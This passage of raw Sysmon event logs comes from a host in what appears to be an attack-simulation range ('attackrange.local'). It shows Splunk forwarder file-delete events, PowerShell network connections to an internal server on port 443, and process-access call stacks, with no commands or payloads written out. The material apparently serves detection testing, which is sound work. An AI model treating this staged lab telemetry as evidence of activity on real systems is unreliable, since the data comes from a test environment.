Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=823A8E2D2E8620BA52C2360A11A99B17,SHA256=168477F653B85F660FBB0D1416A982699F1E4B84ADE50570ECA2CD6B83C88FB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:11.292{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56653-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:46.273{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A139B3714B3EA78D3C440689D0B09D56,SHA256=1E578EFFD57D30E3CF575AF5513D809AE6D88CDDD13AD412BEC6A9992CA0BEB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:47.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80A54233B1D937B083575B5D069FDF37,SHA256=78CC3B209771A01DE166D8199AE9229063980E0D62D6942224C861C5D3E9C7D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:48.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1CF23EB6C298083ECA033B63E68485A,SHA256=CECDDC1760B6FF90AC8910BC866CF5C8F498EF6DCBC675F475E1EEF0B4D9908E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.156{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56654-false10.0.1.12-8000- 23542300x800000000000000035084821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:49.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D39C16385F11ADEDA444D61AEF5294AE,SHA256=7801C05ED3C7DD8B80190F3CAD8B745A2F1BBDABC584EA9D8F38EF3CF0259E7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3029EC7AEA7DA0A4E5D40817E4E80C4,SHA256=526A1FA006B49F768786F77B9DAE310A6772BF29103B63F7DD35C7784E5BE84E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:15.293{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56655-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D0FFB2BC754920F1DF70BE75607BE8BA,SHA256=215E39A577E2589B97E0735D4FF9FBBC5C4E860DF018FE92BA5AF333BC47D1CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:51.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C19B8CCF3BA9EA7C4E1B889BDC9FEC77,SHA256=C7A8969709935194CF97AFA5ADA998D7A286CAD017B4EE4DED9A69F978830DEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:53.000{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C088B0320DB754D42E2EB8A56E0F28D,SHA256=40842E77A115DF52F6BF413A4F3B6A1229D8A9CBC2A4395549FD5C96583E7B36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:19.074{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56656-false10.0.1.12-8000- 23542300x800000000000000035084828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:54.882{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:54.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C39813E140DD2108DBF7D426D284058,SHA256=CC6BD3437E13C614849ACF8A333BA43D2058D625A92B46660E06C51F34D79B04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:55.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECB45B9A7CE4A634FFEE8EA9F4F18D1E,SHA256=61FA5D7CF8E625A2B208F5AB335B7A713297461A0CB801EA34416638F10F197A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=63C676EF6D61AE27D8A51EE96853B3F9,SHA256=7AC8E6F980B8765DFE600C5DA38AC142C2ECCB7AD77EB6E01E445446E9EDD566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07A8499229B8286491C1B9550D42E215,SHA256=23847BBC4FAA480E8D132CDF4CD2F208B6B62C08B22D5D3BC41FF872AC04C0DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:57.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD5A49E680AD92C2C1E686EE0769F8B,SHA256=0C072113E289A2B61A0140C01F55C957D7877B72AD82FD900BC5F23CE139FD6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:57.151{B81B27B7-4012-611D-0D00-00000000C801}7922908C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:21.303{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56658-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:20.887{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56657-false10.0.1.12-8089- 23542300x800000000000000035084837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:58.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E01C590ABFF543417069C599C7BF7148,SHA256=A0EF6DFD961A3EE2EAD0838540E508AC6FE200958B427ED7185D99315F93748C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:59.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC91D6F700E9C32DC8E580508FBEB87E,SHA256=E2E28A850A53A638C32D09D6BDAD7138B182DB6479299F4275053344048B5BA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:00.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3514C005BF4BB03606525F9AA741A2C6,SHA256=67D31E66342BBC3C9498FCF931B2DA0EA0B1FDD22305A8F81B0D3C1543F1BB25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:01.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53F9DE3FAE9193FA4B903FF8A5DDABAD,SHA256=9F7C4E380A79698404D7C3AF11D8BCC9E53CD659033847C258253A527565C3D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:25.101{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56659-false10.0.1.12-8000- 23542300x800000000000000035084843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:02.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA17421752B959316194DCD112350333,SHA256=178CAFDAF61EF14699ABC9EB398BA1F88308BACEDB08562A8FAC0889DD835EFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:02.297{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BA554913BB133D47FBF847D6ABD84BAF,SHA256=24978B8304ED85AE01ED3C508DF3ECD63F2AEECF609FFA90DFA703614E5F98C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:03.430{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE61DE65C774FCECC2CAD045A379AE8,SHA256=23A85E15E9BEA8427B6BCC9CD873BD2AB9C1AA9D5D2A471E87557F9543A7A0B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:27.315{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56660-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:04.448{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF4661F55CCFCDDB733D28B41374292E,SHA256=D34AB83EEED1C429CC4983F1CC0FFEB64802FD0F3B064B949A72F1C686520883,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:05.479{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD63DBCB4FF011E0E2AD54F46D1732B,SHA256=90EED5BBD03C669C6F2C509AC1CFED0BCEFB541147AD8CF16CF61DAC2669E774,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.050{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56661-false10.0.1.12-8000- 23542300x800000000000000035084848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:06.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0248C5A9FF5F9C38DFBA94D721632F,SHA256=2D84CE4C4B0FC40E2E7F60B9122CB63886C5BB4EE7BC3B0C7822366D4A28A8AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:07.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A060707FE774AF123B3FDF0706608B6,SHA256=589A384C17DEF706E0D9D8A9C6BD210AE0DEB7DF721623E9176CCF8814886246,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:08.510{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C38FA56C95529A7132FD7F9B3AF6BD6,SHA256=7568586D7D9F3A5A926F65D6C5541ED8759D911A24F092D3937EF39AB79ECE8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:08.329{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E08CDC1B6EB636A43D84A8E4A04E23A9,SHA256=1DB18D0AC35169843583EF0986B3BE9415D7E507721085299B53D1F3C04607E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:33.330{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56662-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 
23542300x800000000000000035084853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:09.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DCCA1D1AC172701C0C1C14643E155C8,SHA256=8D04155E8D118B6ADB1A04A96F33F7668C469996071B6F8B8264CF920939FEAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:10.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB010711ACF6FE70FDF4A634EAD337E3,SHA256=1EE2D647632CE97640AE161267F828FA93C0498221270B3349A91C26AB94D18F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.113{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56663-false10.0.1.12-8000- 23542300x800000000000000035084856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:11.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A522A8CF6F84A6913DFCD6FD695016F,SHA256=42901EA0772064136C808B359647CEBAB4EC135BD9D4A6EC616BBEEEF909EB9C,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035084858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:12.606{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9DF65C49FA144033D210DDA74A48402,SHA256=75608958DB545438AE33F1991B70FAA23C8C2A8AC44E876D97ABC971AB0DCA10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
